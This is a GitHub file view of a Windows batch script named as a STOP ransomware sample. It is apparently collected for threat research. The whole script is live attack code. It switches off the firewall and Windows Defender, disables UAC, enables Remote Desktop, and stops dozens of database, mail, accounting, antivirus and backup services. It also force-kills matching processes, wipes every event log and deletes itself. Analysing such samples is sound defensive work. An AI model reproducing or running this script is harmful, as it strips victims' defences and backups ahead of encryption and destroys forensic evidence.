-
Notifications
You must be signed in to change notification settings - Fork 6
/
2022-04-03_Ransomware_STOP.bat
110 lines (110 loc) · 3.26 KB
/
2022-04-03_Ransomware_STOP.bat
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
netsh advfirewall set currentprofile state off
net stop MSSQLServerADHelper100
net stop MSSQL$ISARS
net stop MSSQL$MSFW
net stop SQLAgent$ISARS
net stop SQLAgent$MSFW
net stop SQLBrowser
net stop ReportServer$ISARS
net stop SQLWriter
net stop WinDefend
net stop mr2kserv
net stop MSExchangeADTopology
net stop MSExchangeFBA
net stop MSExchangeIS
net stop MSExchangeSA
net stop ShadowProtectSvc
net stop SPAdminV4
net stop SPTimerV4
net stop SPTraceV4
net stop SPUserCodeV4
net stop SPWriterV4
net stop SPSearch4
net stop MSSQLServerADHelper100
net stop IISADMIN
net stop firebirdguardiandefaultinstance
net stop ibmiasrw
net stop QBCFMonitorService
net stop QBVSS
net stop QBPOSDBServiceV12
net stop "IBM Domino Server (CProgramFilesIBMDominodata)"
net stop "IBM Domino Diagnostics (CProgramFilesIBMDomino)"
net stop IISADMIN
net stop "Simply Accounting Database Connection Manager"
net stop QuickBooksDB1
net stop QuickBooksDB2
net stop QuickBooksDB3
net stop QuickBooksDB4
net stop QuickBooksDB5
net stop QuickBooksDB6
net stop QuickBooksDB7
net stop QuickBooksDB8
net stop QuickBooksDB9
net stop QuickBooksDB10
net stop QuickBooksDB11
net stop QuickBooksDB12
net stop QuickBooksDB13
net stop QuickBooksDB14
net stop QuickBooksDB15
net stop QuickBooksDB16
net stop QuickBooksDB17
net stop QuickBooksDB18
net stop QuickBooksDB19
net stop QuickBooksDB20
net stop QuickBooksDB21
net stop QuickBooksDB22
net stop QuickBooksDB23
net stop QuickBooksDB24
net stop QuickBooksDB25
taskkill /f /im mysql* /T
taskkill /f /im IBM* /T
taskkill /f /im bes10* /T
taskkill /f /im black* /T
taskkill /f /im sql /T
taskkill /f /im store.exe /T
taskkill /f /im sql* /T
taskkill /f /im vee* /T
taskkill /f /im postg* /T
taskkill /f /im sage* /T
REG add "HKLM\SYSTEM\CurrentControlSet\services\WinDefend" /v Start /t REG_DWORD /d 4 /f
REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0 /f
net.exe stop avpsus /y
net.exe stop McAfeeDLPAgentService /y
net.exe stop mfewc /y
net.exe stop BMR Boot Service /y
net.exe stop NetBackup BMR MTFTP Service /y
net.exe stop DefWatch /y
net.exe stop ccEvtMgr /y
net.exe stop ccSetMgr /y
net.exe stop SavRoam /y
net.exe stop RTVscan /y
net.exe stop QBFCService /y
net.exe stop QBIDPService /y
net.exe stop Intuit.QuickBooks.FCS /y
net.exe stop QBCFMonitorService /y
net.exe stop YooBackup /y
net.exe stop YooIT /y
net.exe stop zhudongfangyu /y
net.exe stop stc_raw_agent /y
net.exe stop VSNAPVSS /y
net.exe stop VeeamTransportSvc /y
net.exe stop VeeamDeploymentService /y
net.exe stop VeeamNFSSvc /y
net.exe stop veeam /y
net.exe stop PDVFSService /y
net.exe stop BackupExecVSSProvider /y
net.exe stop BackupExecAgentAccelerator /y
net.exe stop BackupExecAgentBrowser /y
net.exe stop BackupExecDiveciMediaService /y
net.exe stop BackupExecJobEngine /y
net.exe stop BackupExecManagementService /y
net.exe stop BackupExecRPCService /y
net.exe stop AcrSch2Svc /y
net.exe stop AcronisAgent /y
net.exe stop CASAD2DWebSvc /y
net.exe stop CAARCUpdateSvc /y
net.exe stop sophos /y
for /F "tokens=*" %%1 in ('wevtutil.exe el') DO wevtutil.exe cl "%%1"
del %0